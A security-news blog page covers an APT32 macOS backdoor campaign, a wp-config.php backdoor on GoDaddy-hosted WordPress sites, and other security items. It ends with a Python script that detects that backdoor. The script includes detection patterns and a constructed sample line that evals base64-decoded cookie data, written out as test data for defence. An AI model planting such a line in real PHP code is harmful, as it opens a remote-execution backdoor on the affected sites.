
MacOS users targeted with dangerous new malware


Cyber threats are increasingly targeting macOS users and new research from Trend Micro has discovered that a new malware variant is currently being deployed online by a nation-state-backed hacking operation.

The firm's security researchers believe that the Vietnamese hacking group OceanLotus, known as APT32, is behind this new malware campaign due to “similarities in dynamic behavior and code” with previous samples collected from the group.

In the past, OceanLotus has targeted foreign organizations working in Vietnam from a variety of different industries including media, research and construction. While the group's motivations aren't entirely clear, it is believed that the group conducts espionage on foreign firms to help Vietnamese-owned companies.

The backdoor recently discovered by Trend Micro allows OceanLotus to spy on compromised machines and steal confidential information and sensitive business documents from macOS users.

OceanLotus attacks

The recent series of attacks launched by the OceanLotus group begins with a phishing email that encourages users to run a Zip file disguised as a Word document; the file evades detection by antivirus software through the use of special characters.

The attack could be discovered by users who realize that a Microsoft Word document doesn't open when they click on the email's attachment. However, by this time, the initial payload is already in the process of changing access permissions in order to load a second-stage payload that prompts a user to install a third and final payload. This third-stage payload then downloads the backdoor onto a user's system.

Just like older versions of OceanLotus' malware, this new variant tries to collect system information and create a backdoor that allows the group to spy on a user and download files from their system. The malware can also be used to upload additional malicious software to the system if required and Trend Micro believes that the malware is still actively being developed by the group.

In order to prevent falling victim to this latest campaign, Trend Micro recommends that macOS users remain vigilant when it comes to clicking on links or downloading attachments from emails sent by unknown sources. At the same time, users should apply the latest security patches to prevent OceanLotus and other hacking groups from exploiting known vulnerabilities.

Via ZDNet

Date: 01 Dec 2020

Other Blog

  • Google Chrome is making a small but vital change in how it keeps you secure

    Chrome will no longer show a lock icon when visiting sites using HTTPS while sites using HTTP will still appear as “Not secure”.

    Read More
  • Microsoft's new security chip will not lock devices to Windows 11 as feared

    New PCs released this year that ship with Microsoft's Pluton security chip will still be able to run other operating systems besides Windows 11.

    While it was initially feared by the open-source community and others that Pluton would serve as a means to lock equipment to the latest version of Windows, that isn't the case at all. Instead, in addition to being able to install Linux and BSD, PC makers and even users themselves will be able to turn off the feature entirely.

    The first Windows 11 PCs with Pluton built-in were shown off at CES 2022 and Intel, AMD and Qualcomm are all planning to embed Microsoft's security chip in their latest or upcoming microprocessors.

    Pluton itself can act as a Trusted Platform Module (TPM) or as a non-TPM security coprocessor according to a new report by The Register. Essentially the new security chip will serve as a way for Microsoft to show chipmakers how it wants TPM to be present in microprocessors going forward.

    Enabled or disabled

    PC makers have the option to ship their new Windows 11 PCs with Pluton either enabled or disabled though end users will also be able to reverse this decision if they want to.

    Microsoft's Pluton design was integrated into AMD's latest Ryzen 6000 chips but users will be able to disable the security chip on machines that follow the chipmaker's reference firmware. This can be done in the company's reference BIOS.

    The Register also learned from a Lenovo spokesperson that Pluton will be disabled by default on the company's new Z13, Z16, T14, T16, T14s, P16s and X13 ThinkPads that feature Ryzen 6000-series processors. However, users will be able to enable Pluton themselves.

    Meanwhile, Intel's latest Alder Lake processors will include a Pluton-equivalent called Intel Platform Trust Technology which is a TPM 2.0 compatible component.


    Via The Register

    Read More
  • Hundreds of GoDaddy sites caught up in hacking campaign

    A new hacking campaign infecting hundreds of GoDaddy-hosted sites has been uncovered.

    An investigation by the Wordfence Incident Response team found more than 280 websites hosted with GoDaddy’s Managed WordPress service were infected with a backdoor.

    Among the compromised services are MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe, with a total of 298 sites found to be infected. 


    This unnamed backdoor, it was further explained, has been in use for at least seven years. The threat actors add it to the beginning of wp-config.php and its goal seems to be to generate spammy Google search results, including resources customized to the infected site. 

    Russian TLD

    “If a request with a cookie set to a certain base64-encoded value is sent to the site, the backdoor will download a spam link template from a command and control (C2) domain – in this case t-fish-ka[.]ru – and save it to an encoded file with a name set to the MD5 hash of the infected site’s domain,” the researchers explained. “For example, the encoded file for ‘examplesite.com’ would be named 8c14bd67a49c34807b57202eb549e461, which is a hash of that domain.”

    The C2 domain has a Russian top-level domain, but there’s nothing to indicate that this particular campaign has anything to do with Russia’s ongoing invasion of Ukraine. 

    The researchers have yet to discover how the threat actors made their way into GoDaddy's services, speculating that it might be linked to last year's attack on the company's systems. In 2021, GoDaddy reported that an unknown attacker had accessed the systems it uses to provision its Managed WordPress sites.

    Customers of GoDaddy's Managed WordPress platform are advised to manually inspect their site's wp-config.php file, or run a scan with a malware detection solution, to make sure their sites are clean.

    Those who do find something can use the instructions found at this link to clean any malicious code from their sites.

    Read More
  • Why Android is the OS of choice for emergency services

    Emergency Services previously relying on Windows-based mobile computers are evaluating strategies to migrate to Android.

    Read More
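The wp-config.php backdoor described in the GoDaddy item above can be checked for with a small script. This is an added example, not code from Wordfence or GoDaddy; the suspicious-call markers and the constructed sample configs are assumptions based on the described behaviour, and only the MD5-of-domain file naming comes from the report.

```python
import hashlib
import re
from pathlib import Path
from typing import List, Optional

# A stock wp-config.php defines constants and includes wp-settings.php; it has
# no reason to read cookies, decode base64 or eval anything. These markers are
# an assumed heuristic derived from the described cookie trigger, not
# published signatures.
SUSPICIOUS = re.compile(r"\$_COOKIE|base64_decode\s*\(|\beval\s*\(", re.IGNORECASE)


def cache_file_name(domain: str) -> str:
    """Name the backdoor was reported to give its downloaded spam template:
    the MD5 hex digest of the infected site's domain."""
    return hashlib.md5(domain.encode()).hexdigest()


def inspect_wp_config(source: str) -> List[str]:
    """Return findings for a wp-config.php body; an empty list means nothing seen."""
    findings = []
    # Code prepended to the file often closes its own PHP block before the real
    # config opens, leaving more than one open tag.
    if source.lstrip().startswith("<?php") and source.count("<?php") > 1:
        findings.append("multiple PHP open tags (code prepended before the real config)")
    match = SUSPICIOUS.search(source)
    if match:
        findings.append(f"suspicious call {match.group(0)!r}")
    return findings


def find_cache_artifact(webroot: Path, domain: str) -> Optional[Path]:
    """Look for the MD5-named template file the backdoor writes into the webroot."""
    candidate = webroot / cache_file_name(domain)
    return candidate if candidate.is_file() else None


# Constructed samples: a minimal clean config and the same config with a
# cookie-triggered eval block prepended, mimicking the reported placement.
CLEAN = "<?php\ndefine('DB_NAME', 'wp');\nrequire_once ABSPATH . 'wp-settings.php';\n"
INJECTED = (
    "<?php\nif (isset($_COOKIE['x'])) { eval(base64_decode($_COOKIE['x'])); }\n?>\n"
    + CLEAN
)

if __name__ == "__main__":
    print("clean:", inspect_wp_config(CLEAN))
    print("injected:", inspect_wp_config(INJECTED))
    print("examplesite.com ->", cache_file_name("examplesite.com"))
```

Run it against a real site by reading wp-config.php into `inspect_wp_config` and passing the document root and domain to `find_cache_artifact`.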
